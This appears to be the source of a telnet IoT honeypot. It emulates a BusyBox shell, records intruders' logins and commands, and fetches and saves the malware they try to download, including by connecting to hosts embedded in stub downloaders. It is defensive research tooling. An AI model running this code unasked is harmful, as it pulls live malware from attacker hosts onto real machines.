salt=$(openssl rand -hex 16)
echo "backend_user: $user" >> config.yaml
echo "backend_pass: $pass" >> config.yaml
echo "backend_salt: $salt" >> config.yaml
echo "http_addr: \"0.0.0.0\"" >> config.yaml
echo "telnet_addr: \"0.0.0.0\"" >> config.yaml
echo "backend: \"http://backend:5000\"" >> config.yaml
echo "log_samples: True" >> config.yaml
echo "sample_dir: samples" >> config.yaml
# DB setup
if [ "$dbbackend" = "maria" ]; then
dbpass=$(openssl rand -hex 16)
sql="mysql+mysqldb://honey:$dbpass@honeydb/honey"
echo sql: \"$sql\" >> config.yaml
fi
# docker-compose setup
echo " - Writing docker-compose.yml"
cat << EOF >> docker-compose.yml
version: "3.7"
services:
honeypot:
depends_on:
- backend
image: telnet-iot-honeypot:hot
restart: always
entrypoint:
- python
- honeypot.py
ports:
- "2323:2323"
volumes:
- "./samples:/usr/src/app/samples"
backend:
build: .
image: telnet-iot-honeypot:hot
restart: always
entrypoint:
- python
- backend.py
ports:
- "5000:5000"
volumes:
- "./samples:/usr/src/app/samples"
EOF
if [ "$dbbackend" = "maria" ]; then
cat << EOF >> docker-compose.yml
depends_on:
- honeydb
honeydb:
image: mariadb:latest
restart: always
environment:
MYSQL_RANDOM_ROOT_PASSWORD: "yes"
MYSQL_DATABASE: honey
MYSQL_USER: honey
MYSQL_PASSWORD: $dbpass
EOF
fi
echo -n "Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): "
read runit
if [ "$runit" = "d" ]; then
sudo docker-compose up -d
elif [ "$runit" = "Y" ] || [ "$runit" = "y" ] || [ "$runit" = "" ]; then
sudo docker-compose up
fi
================================================
FILE: honeypot/__init__.py
================================================
================================================
FILE: honeypot/__main__.py
================================================
import signal
from telnet import Telnetd
from util.dbg import dbg
def signal_handler(signal, frame):
dbg('Ctrl+C')
srv.stop()
signal.signal(signal.SIGINT, signal_handler)
srv = Telnetd(2222)
srv.run()
================================================
FILE: honeypot/client.py
================================================
import requests
import requests.exceptions
import requests.auth
import json
from util.dbg import dbg
from util.config import config
class Client:
def __init__(self):
self.user = config.get("backend_user")
self.password = config.get("backend_pass")
self.url = config.get("backend")
self.auth = requests.auth.HTTPBasicAuth(self.user, self.password)
self.test_login()
def test_login(self):
try:
r = requests.get(self.url + "/connections", auth=self.auth, timeout=20.0)
except:
raise IOError("Cannot connect to backend")
try:
r = requests.get(self.url + "/login", auth=self.auth, timeout=20.0)
if r.status_code != 200:
raise IOError()
except:
raise IOError("Backend authentification test failed, check config.json")
def put_session(self, session, retry=True):
try:
r = requests.put(self.url + "/conns", auth=self.auth, json=session, timeout=20.0)
except requests.exceptions.RequestException:
dbg("Cannot connect to backend")
return []
if r.status_code == 200:
return r.json()
elif retry:
msg = r.raw.read()
dbg("Backend upload failed, retrying (" + str(msg) + ")")
return self.put_session(session, False)
else:
msg = r.raw.read()
raise IOError(msg)
def put_sample(self, data, retry=True):
try:
r = requests.post(self.url + "/file", auth=self.auth, data=data, timeout=20.0)
except requests.exceptions.RequestException:
dbg("Cannot connect to backend")
return
if r.status_code == 200:
return
elif retry:
msg = r.raw.read()
dbg("Backend upload failed, retrying (" + str(msg) + ")")
return self.put_sample(sha256, filename, False)
else:
msg = r.raw.read()
raise IOError(msg)
================================================
FILE: honeypot/sampledb_client.py
================================================
import client
import time
import traceback
import os
import requests
import hashlib
import json
from util.dbg import dbg
from util.config import config
BACKEND = None
def get_backend():
global BACKEND
if BACKEND != None:
return BACKEND
elif config.get("backend", optional=True) != None:
BACKEND = client.Client()
return BACKEND
else:
return None
def sha256(data):
h = hashlib.sha256()
h.update(data)
return h.hexdigest()
class SampleRecord:
def __init__(self, url, name, info, data):
self.url = url
self.name = name
self.date = int(time.time())
self.info = info
self.data = data
if data:
self.sha256 = sha256(data)
self.length = len(data)
else:
self.sha256 = None
self.length = None
def json(self):
return {
"type": "sample",
"url": self.url,
"name": self.name,
"date": self.date,
"sha256": self.sha256,
"info": self.info,
"length": self.length
}
class SessionRecord:
def __init__(self):
self.back = get_backend()
self.logfile = config.get("log_raw", optional=True)
self.log_samples = config.get("log_samples", optional=True, default=False)
self.sample_dir = config.get("sample_dir", optional=not(self.log_samples))
self.urlset = {}
self.ip = None
self.user = None
self.password = None
self.date = None
self.urls = []
self.stream = []
def log_raw(self, obj):
if self.logfile != None:
with open(self.logfile, "ab") as fp:
fp.write(json.dumps(obj).replace("\n", "") + "\n")
def json(self):
return {
"type" : "connection",
"ip" : self.ip,
"user" : self.user,
"pass" : self.password,
"date" : self.date,
"stream" : self.stream,
"samples" : map(lambda sample: sample.json(), self.urls),
}
def addInput(self, text):
self.stream.append({
"in": True,
"ts": round((time.time() - self.date) * 1000) / 1000,
"data": text.decode('ascii', 'ignore')
})
def addOutput(self, text):
self.stream.append({
"in": False,
"ts": round((time.time() - self.date) * 1000) / 1000,
"data": text.decode('ascii', 'ignore')
})
def set_login(self, ip, user, password):
self.ip = ip
self.user = user
self.password = password
self.date = int(time.time())
def add_file(self, data, url=None, name=None, info=None):
if url == None:
shahash = sha256(data)
# Hack, must be unique somehow, so just use the hash ..."
url = "telnet://" + self.ip + "/" + shahash[0:8]
if name == None:
name = url.split("/")[-1].strip()
sample = SampleRecord(url, name, info, data)
self.urlset[url] = sample
self.urls.append(sample)
def commit(self):
self.log_raw(self.json())
if self.log_samples:
for sample in self.urls:
if sample.data:
fp = open(self.sample_dir + "/" + sample.sha256, "wb")
fp.write(sample.data)
fp.close()
# Ignore connections without any input
if len(self.stream) > 1 and self.back != None:
upload_req = self.back.put_session(self.json())
================================================
FILE: honeypot/session.py
================================================
import re
import random
import time
import json
import traceback
import struct
import socket
import select
import errno
from util.dbg import dbg
from util.config import config
from sampledb_client import SessionRecord
from shell.shell import Env, run
MIN_FILE_SIZE = 128
PROMPT = " # "
class Session:
def __init__(self, output, remote_addr):
dbg("New Session")
self.output = output
self.remote_addr = remote_addr
self.record = SessionRecord()
self.env = Env(self.send_string)
self.env.listen("download", self.download)
# Files already commited
self.files = []
def login(self, user, password):
dbg("Session login: user=" + user + " password=" + password)
self.record.set_login(self.remote_addr, user, password)
self.send_string(PROMPT)
def download(self, data):
path = data["path"]
url = data["url"]
info = data["info"]
data = data["data"]
dbg("Downloaded " + url + " to " + path)
if data:
self.record.add_file(data, url=url, name=path, info=info)
self.files.append(path)
else:
self.record.add_file(None, url=url, name=path, info=info)
def found_file(self, path, data):
if path in self.files:
pass
else:
if len(data) > MIN_FILE_SIZE:
dbg("File created: " + path)
self.record.add_file(data, name=path)
else:
dbg("Ignore small file: " + path + " (" + str(len(data)) + ") bytes")
def end(self):
dbg("Session End")
for path in self.env.files:
self.found_file(path, self.env.files[path])
for (path, data) in self.env.deleted:
self.found_file(path, data)
self.record.commit()
def send_string(self, text):
self.record.addOutput(text)
self.output(text)
def shell(self, l):
self.record.addInput(l + "\n")
try:
tree = run(l, self.env)
except:
dbg("Could not parse \""+l+"\"")
self.send_string("sh: syntax error near unexpected token `" + " " + "'\n")
traceback.print_exc()
self.send_string(PROMPT)
================================================
FILE: honeypot/shell/__init__.py
================================================
================================================
FILE: honeypot/shell/commands/__init__.py
================================================
================================================
FILE: honeypot/shell/commands/base.py
================================================
import sys
import traceback
from binary import run_binary
class Proc:
procs = {}
@staticmethod
def register(name, obj):
Proc.procs[name] = obj
@staticmethod
def get(name):
if name in Proc.procs:
return Proc.procs[name]
else:
return None
class StaticProc(Proc):
def __init__(self, output, result=0):
self.output = output
self.result = result
def run(self, env, args):
env.write(self.output)
return self.result
class FuncProc(Proc):
def __init__(self, func):
self.func = func
def run(self, env, args):
env.write(self.func(args))
return 0
# Basic Procs
class Exec(Proc):
def run(self, env, args):
if len(args) == 0:
return 0
if args[0][0] == ">":
name = "true"
elif args[0].startswith("./"):
fname = args[0][2:]
fdata = env.readFile(fname)
if fdata == None:
env.write("sh: 1: ./" + fname + ": not found\n")
return 1
else:
run_binary(fdata, fname, args[1:], env)
return 0
else:
name = args[0]
args = args[1:]
# $path = /bin/
if name.startswith("/bin/"):
name = name[5:]
if Proc.get(name):
try:
return Proc.get(name).run(env, args)
except:
traceback.print_exc()
env.write("Segmention fault\n")
return 1
else:
env.write(name + ": command not found\n")
return 1
class BusyBox(Proc):
def run(self, env, args):
if len(args) == 0:
env.write("""BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
Usage: busybox [function [arguments]...]
Currently defined functions:
""" + " ".join(Proc.procs.keys()) + "\n\n")
return 0
name = args[0]
args = args[1:]
if Proc.get(name):
return Proc.get(name).run(env, args)
else:
env.write(name + ": applet not found\n")
return 1
class Cat(Proc):
def run(self, env, args):
fname = args[0]
string = env.readFile(fname)
if string != None:
env.write(string)
return 0
else:
env.write("cat: " + fname + ": No such file or directory\n")
return 1
class Echo(Proc):
def run(self, env, args):
opts = ""
if args[0][0] == "-":
opts = args[0][1:]
args = args[1:]
string = " ".join(args)
if "e" in opts:
string = string.decode('string_escape')
env.write(string)
if not("n" in opts):
env.write("\n")
return 0
class Rm(Proc):
def run(self, env, args):
if args[0] in env.listfiles():
env.deleteFile(args[0])
return 0
else:
env.write("rm: cannot remove '" + args[0] + "': No such file or directory\n")
return 1
class Ls(Proc):
def run(self, env, args):
for f in env.listfiles().keys():
env.write(f + "\n")
return 0
class Dd(Proc):
def run(self, env, args):
infile = None
outfile = None
count = None
bs = 512
for a in args:
if a.startswith("if="):
infile = a[3:]
if a.startswith("of="):
outfile = a[3:]
if a.startswith("count="):
count = int(a[6:])
if a.startswith("bs="):
bs = int(a[3:])
if infile != None:
data = env.readFile(infile)
if count != None:
data = data[0:(count*bs)]
if outfile:
env.deleteFile(infile)
env.writeFile(infile, data)
else:
env.write(data)
env.write("""0+0 records in
0+0 records out
0 bytes copied, 0 s, 0,0 kB/s\n""")
return 0
class Cp(Proc):
def run(self, env, args):
infile = args[0]
outfile = args[1]
data = env.readFile(infile)
if data != None:
env.writeFile(outfile, data)
return 0
else:
env.write("cp: cannot stat '" + infile + "': No such file or directory\n")
return 1
Proc.register("cp", Cp())
Proc.register("ls", Ls())
Proc.register("cat", Cat())
Proc.register("dd", Dd())
Proc.register("rm", Rm())
Proc.register("echo", Echo())
Proc.register("busybox", BusyBox())
Proc.register("exec", Exec())
Proc.register("cd", StaticProc(""))
Proc.register("true", StaticProc(""))
Proc.register("chmod", StaticProc(""))
Proc.register("uname", StaticProc(""))
Proc.register(":", StaticProc(""))
Proc.register("ps", StaticProc(
""" PID TTY TIME CMD
6467 pts/0 00:00:00 sh
12013 pts/0 00:00:00 ps\n"""))
# Other files
from wget import Wget
from shell import Shell
# tftp disabled
#from tftp import Tftp
================================================
FILE: honeypot/shell/commands/binary.py
================================================
import socket
import struct
import select
def dbg(s):
print s
def run_binary(data, fname, args, env):
dbg("Parsing binary file " + fname + " (" + str(len(data)) + " bytes)")
socks = []
tuples = []
pos = 0
while True:
pos = data.find("\x02\x00", pos)
if pos == -1: break
sockaddr = data[pos:pos+8]
sockaddr = struct.unpack(">HHBBBB", sockaddr)
pos += 8
# Ignore ip addresses starting with 0 or > 224 (multicast)
if (sockaddr[2] == 0 or sockaddr[2] >= 224):
continue
ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5])
port = sockaddr[1]
tuples.append((ip, port))
for addr in tuples:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)
s.setblocking(0)
s.connect_ex(addr)
socks.append(s)
dbg("Trying tcp://" + addr[0] + ":" + str(addr[1]))
except:
pass
goodsocket = None
data = None
url = None
while len(socks) > 0:
read, a, b = select.select(socks, [], [], 15)
if len(read) == 0: break
for s in read:
if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
try:
s.setblocking(1)
data = s.recv(1024)
goodsocket = s
peer = s.getpeername()
url = "tcp://" + peer[0] + ":" + str(peer[1])
dbg("Connected to " + url)
break
except:
s.close()
socks.remove(s)
else:
s.close()
socks.remove(s)
if goodsocket != None:
break
for s in socks:
if s != goodsocket:
s.close()
if goodsocket == None:
dbg("Could not connect.\n")
#for addr in tuples:
# env.write(tuples[0] + ":" + tuples[1] + "\n")
return 1
while True:
r = goodsocket.recv(1024)
if r != "":
data += r
else:
break
goodsocket.close()
# Normally these stub downloaders will output to stdout
env.write(data)
env.action("download", {
"url": url,
"path": "(stdout)",
"info": "",
"data": data
})
return 0
================================================
FILE: honeypot/shell/commands/cmd_util.py
================================================
from getopt import gnu_getopt, GetoptError
def easy_getopt(args, opt, longopts=[]):
optlist, args = gnu_getopt(args, opt, longopts)
optdict = {}
for item in optlist:
optdict[item[0]] = item[1]
return optdict, args
================================================
FILE: honeypot/shell/commands/shell.py
================================================
from base import Proc
class Shell(Proc):
def run(self, env, args):
from honeypot.shell.shell import run
if len(args) == 0:
env.write("Busybox built-in shell (ash)\n")
return 0
fname = args[0]
contents = env.readFile(fname)
if contents == None:
env.write("sh: 0: Can't open " + fname)
return 1
else:
shell = Proc.get("exec")
for line in contents.split("\n"):
line = line.strip()
line = line.split("#")[0]
run(line, env)
return 0
Proc.register("sh", Shell())
================================================
FILE: honeypot/shell/commands/shellcode.py
================================================
from base import Proc
class Shellcode():
def run(self, data):
dbg("Parsing stub downloader (" + str(len(data)) + " bytes)")
socks = []
tuples = []
pos = 0
while True:
pos = data.find("\x02\x00", pos)
if pos == -1: break
sockaddr = data[pos:pos+8]
sockaddr = struct.unpack(">HHBBBB", sockaddr)
ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5])
port = sockaddr[1]
tuples.append((ip, port))
pos += 8
for addr in tuples:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)
s.setblocking(0)
s.connect_ex(addr)
socks.append(s)
dbg("Trying tcp://" + addr[0] + ":" + str(addr[1]))
except:
pass
goodsocket = None
data = None
url = None
while len(socks) > 0:
read, a, b = select.select(socks, [], [], 15)
if len(read) == 0: break
for s in read:
if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
try:
s.setblocking(1)
data = s.recv(1024)
goodsocket = s
peer = s.getpeername()
url = "tcp://" + peer[0] + ":" + str(peer[1])
dbg("Connected to " + url)
break
except:
s.close()
socks.remove(s)
else:
s.close()
socks.remove(s)
if goodsocket != None:
break
for s in socks:
if s != goodsocket:
s.close()
if goodsocket == None:
dbg("Could not connect to any addresses in binary.")
return
while True:
r = goodsocket.recv(1024)
if r != "":
data += r
else:
break
goodsocket.close()
self.record.add_file(data, url=url)
================================================
FILE: honeypot/shell/commands/tftp.py
================================================
#!/usr/bin/env python
import io
import traceback
from getopt import gnu_getopt, GetoptError
from tftpy import TftpClient
from cmd_util import easy_getopt
from base import Proc
from util.config import config
class DummyIO(io.RawIOBase):
def __init__(self):
self.data = ""
def write(self, s):
self.data += s
class StaticTftp(Proc):
def run(self, env, args):
Tftp().run(env, args)
class Tftp:
help = """BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
"""
def run(self, env, args):
self.env = env
self.connected = False
self.chunks = 0
try:
opts, args = easy_getopt(args, "l:r:gpb:")
except GetoptError as e:
env.write("tftp: " + str(e) + "\n")
env.write(Tftp.help)
return
if len(args) == 0:
env.write(Tftp.help)
return
elif len(args) == 1:
host = args[0]
port = 69
if ":" in host:
parts = host.split(":")
host = parts[0]
port = int(parts[1])
else:
host = args[0]
port = int(args[1])
if "-p" in opts:
env.write("tftp: option 'p' not implemented\n")
return
if "-b" in opts:
env.write("tftp: option 'b' not implemented\n")
return
if "-r" in opts:
path = opts["-r"]
else:
print Tftp.help
return
if "-l" in opts:
fname = opts["-l"]
else:
fname = path
try:
data = self.download(host, port, path)
env.writeFile(fname, data)
env.action("download", {
"url": "tftp://" + host + ":" + str(port) + "/" + path,
"path": fname,
"info": None,
"data": data
})
self.env.write("\nFinished. Saved to " + fname + ".\n")
except:
env.write("tftp: timeout\n")
env.action("download", {
"url": "tftp://" + host + ":" + str(port) + "/" + path,
"path": fname,
"info": None,
"data": None
})
def download(self, host, port, fname):
if config.get("fake_dl", optional=True, default=False):
return str(hash(host + str(port) + fname))
output = DummyIO()
client = TftpClient(host, port)
self.env.write("Trying " + host + ":" + str(port) + " ... ")
client.download(fname, output, timeout=5, packethook=self.pkt)
return output.data
def pkt(self, data):
if not(self.connected):
self.env.write("OK\n")
self.connected = True
#if self.chunks % 60 == 0:
# self.env.write("\n")
self.chunks += 1
#self.env.write(".")
Proc.register("tftp", StaticTftp())
================================================
FILE: honeypot/shell/commands/wget.py
================================================
import requests
import traceback
import datetime
import urlparse
from util.config import config
from base import Proc
class Wget(Proc):
def dl(self, env, url, path=None, echo=True):
u = urlparse.urlparse(url)
host = u.hostname
ip = "127.0.0.1"
port = u.port if u.port else 80
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if echo:
env.write("--"+date+"-- " + url + "\n")
env.write("Resolving " + host + " (" + host + ")... " + ip + "\n")
env.write("Connecting to " + host + " (" + host + ")|" + ip + "|:" + str(port) + "...")
if path == None:
path = url.split("/")[-1].strip()
if path == "":
path = "index.html"
if config.get("fake_dl", optional=True, default=False):
data = str(hash(url))
info = ""
else:
hdr = { "User-Agent" : "Wget/1.15 (linux-gnu)" }
r = None
try:
r = requests.get(url, stream=True, timeout=5.0, headers=hdr)
if echo:
env.write(" connected\n")
env.write("HTTP request sent, awaiting response... 200 OK\n")
env.write("Length: unspecified [text/html]\n")
env.write("Saving to: '"+path+"'\n\n")
env.write(" 0K .......... 7,18M=0,001s\n\n")
env.write(date+" (7,18 MB/s) - '"+path+"' saved [11213]\n")
data = ""
for chunk in r.iter_content(chunk_size = 4096):
data = data + chunk
info = ""
for his in r.history:
info = info + "HTTP " + str(his.status_code) + "\n"
for k,v in his.headers.iteritems():
info = info + k + ": " + v + "\n"
info = info + "\n"
info = info + "HTTP " + str(r.status_code) + "\n"
for k,v in r.headers.iteritems():
info = info + k + ": " + v + "\n"
except requests.ConnectTimeout as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Connection timed out.\n")
env.write("Giving up.\n\n")
except requests.ConnectionError as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Connection refused.\n")
env.write("Giving up.\n\n")
except requests.ReadTimeout as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: Read timeout.\n")
env.write("Giving up.\n\n")
except Exception as e:
data = None
info = "Download failed"
if echo:
env.write(" failed: " + str(e.message) + ".\n")
env.write("Giving up.\n\n")
if data:
env.writeFile(path, data)
env.action("download", {
"url": url,
"path": path,
"info": info,
"data": data
})
def run(self, env, args):
if len(args) == 0:
env.write("""BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[-U|--user-agent AGENT] URL...
Retrieve files via HTTP or FTP
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
""")
return 1
else:
echo = True
for arg in args:
if arg == "-O":
echo = False
for url in args:
if url.startswith("http"):
self.dl(env, url, echo=echo)
return 0
Proc.register("wget", Wget())
================================================
FILE: honeypot/shell/grammar.peg
================================================
grammar cmd
cmd <- cmdlist / empty
cmdlist <- cmdsingle (sep (";" / "&") sep cmdlist)? %make_list
cmdsingle <- cmdpipe (sep ("||" / "&&") sep cmdsingle)? %make_single
cmdpipe <- cmdredir (sep ("|" !"|") sep cmdpipe)? %make_pipe
cmdredir <- cmdargs ( sep (">>-" / ">>" / "<<" / "<>" / "<&" / ">&" / "<" / ">") sep arg )* %make_redir
cmdargs <- cmdbrac / args
cmdbrac <- "(" sep cmd sep ")" %make_cmdbrac
args <- arg (" "+ arg)* %make_args
arg <- arg_quot1 / arg_quot2 / arg_noquot / empty
arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot
arg_quot1 <- "'" [^']* "'" %make_arg_quot
arg_quot2 <- '"' [^"]* '"' %make_arg_quot
arg_noquot <- [^ ;|&()"'><]+ %make_arg_noquot
empty <- ""?
sep <- " "*
================================================
FILE: honeypot/shell/grammar.py
================================================
from collections import defaultdict
import re
class TreeNode(object):
def __init__(self, text, offset, elements=None):
self.text = text
self.offset = offset
self.elements = elements or []
def __iter__(self):
for el in self.elements:
yield el
class TreeNode1(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode1, self).__init__(text, offset, elements)
self.cmdsingle = elements[0]
class TreeNode2(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode2, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdlist = elements[3]
class TreeNode3(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode3, self).__init__(text, offset, elements)
self.cmdpipe = elements[0]
class TreeNode4(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode4, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdsingle = elements[3]
class TreeNode5(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode5, self).__init__(text, offset, elements)
self.cmdredir = elements[0]
class TreeNode6(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode6, self).__init__(text, offset, elements)
self.sep = elements[2]
self.cmdpipe = elements[3]
class TreeNode7(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode7, self).__init__(text, offset, elements)
self.cmdargs = elements[0]
class TreeNode8(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode8, self).__init__(text, offset, elements)
self.sep = elements[2]
self.arg = elements[3]
class TreeNode9(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode9, self).__init__(text, offset, elements)
self.sep = elements[3]
self.cmd = elements[2]
class TreeNode10(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode10, self).__init__(text, offset, elements)
self.arg = elements[0]
class TreeNode11(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode11, self).__init__(text, offset, elements)
self.arg = elements[1]
class ParseError(SyntaxError):
pass
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[^\']')
REGEX_2 = re.compile('^[^"]')
REGEX_3 = re.compile('^[^ ;|&()"\'><]')
def _read_cmd(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmd'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_cmdlist()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_empty()
if address0 is FAILURE:
self._offset = index1
self._cache['cmd'][index0] = (address0, self._offset)
return address0
def _read_cmdlist(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdlist'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdsingle()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == ';':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('";"')
if address4 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '&':
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"&"')
if address4 is FAILURE:
self._offset = index4
if address4 is not FAILURE:
elements1.append(address4)
address5 = FAILURE
address5 = self._read_sep()
if address5 is not FAILURE:
elements1.append(address5)
address6 = FAILURE
address6 = self._read_cmdlist()
if address6 is not FAILURE:
elements1.append(address6)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode2(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_list(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdlist'][index0] = (address0, self._offset)
return address0
def _read_cmdsingle(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdsingle'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdpipe()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 2]
if chunk0 == '||':
address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"||"')
if address4 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == '&&':
address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"&&"')
if address4 is FAILURE:
self._offset = index4
if address4 is not FAILURE:
elements1.append(address4)
address5 = FAILURE
address5 = self._read_sep()
if address5 is not FAILURE:
elements1.append(address5)
address6 = FAILURE
address6 = self._read_cmdsingle()
if address6 is not FAILURE:
elements1.append(address6)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode4(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_single(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdsingle'][index0] = (address0, self._offset)
return address0
def _read_cmdpipe(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['cmdpipe'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_cmdredir()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address3 = FAILURE
address3 = self._read_sep()
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index4, elements2 = self._offset, []
address5 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '|':
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"|"')
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
index5 = self._offset
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '|':
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"|"')
self._offset = index5
if address6 is FAILURE:
address6 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address6 = FAILURE
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index4
else:
elements2 = None
self._offset = index4
if elements2 is None:
address4 = FAILURE
else:
address4 = TreeNode(self._input[index4:self._offset], index4, elements2)
self._offset = self._offset
if address4 is not FAILURE:
elements1.append(address4)
address7 = FAILURE
address7 = self._read_sep()
if address7 is not FAILURE:
elements1.append(address7)
address8 = FAILURE
address8 = self._read_cmdpipe()
if address8 is not FAILURE:
elements1.append(address8)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address2 = FAILURE
else:
address2 = TreeNode6(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['cmdpipe'][index0] = (address0, self._offset)
return address0
